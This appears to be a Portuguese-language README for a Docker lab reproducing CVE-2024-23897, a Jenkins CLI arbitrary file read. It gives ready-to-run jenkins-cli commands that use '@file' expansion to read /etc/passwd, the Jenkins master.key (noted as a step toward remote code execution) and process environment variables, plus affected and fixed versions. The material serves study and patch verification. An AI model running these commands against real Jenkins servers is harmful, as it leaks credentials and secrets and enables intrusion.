
Laboratório baseado em Docker e script de exploit para CVE-2024-23897, uma leitura arbitrária de arquivos crítica na CLI do Jenkins via args4j expandAtFiles, com etapas para encadear para RCE.
# 1. Start lab
docker-compose up -d
# 2. Wait ~30s, then download CLI tool
curl -O http://localhost:8080/jnlpJars/jenkins-cli.jar
# 3. Exploit — read /etc/passwd (full file)
java -jar jenkins-cli.jar -s http://localhost:8080 -http connect-node @/etc/passwd
# 4. Read master.key (chain to RCE)
java -jar jenkins-cli.jar -s http://localhost:8080 -http connect-node @/var/jenkins_home/secrets/master.key
# 5. Read environment variables
java -jar jenkins-cli.jar -s http://localhost:8080 -http help @/proc/self/environ
Consulte REPORT.md para a análise técnica completa (Vietnamita).
| Item | Valor |
|---|---|
| CVSS | 9.8 (Crítico) |
| Atingido | Jenkins <= 2.441, LTS <= 2.426.2 |
| Versão do laboratório | jenkins/jenkins:2.426.2-lts |
| Causa raiz | args4j expandAtFiles ativado no CLI do lado do servidor |
| Correção | Atualize para Jenkins >= 2.442 / LTS >= 2.426.3 |
docker-compose down -v --remove-orphans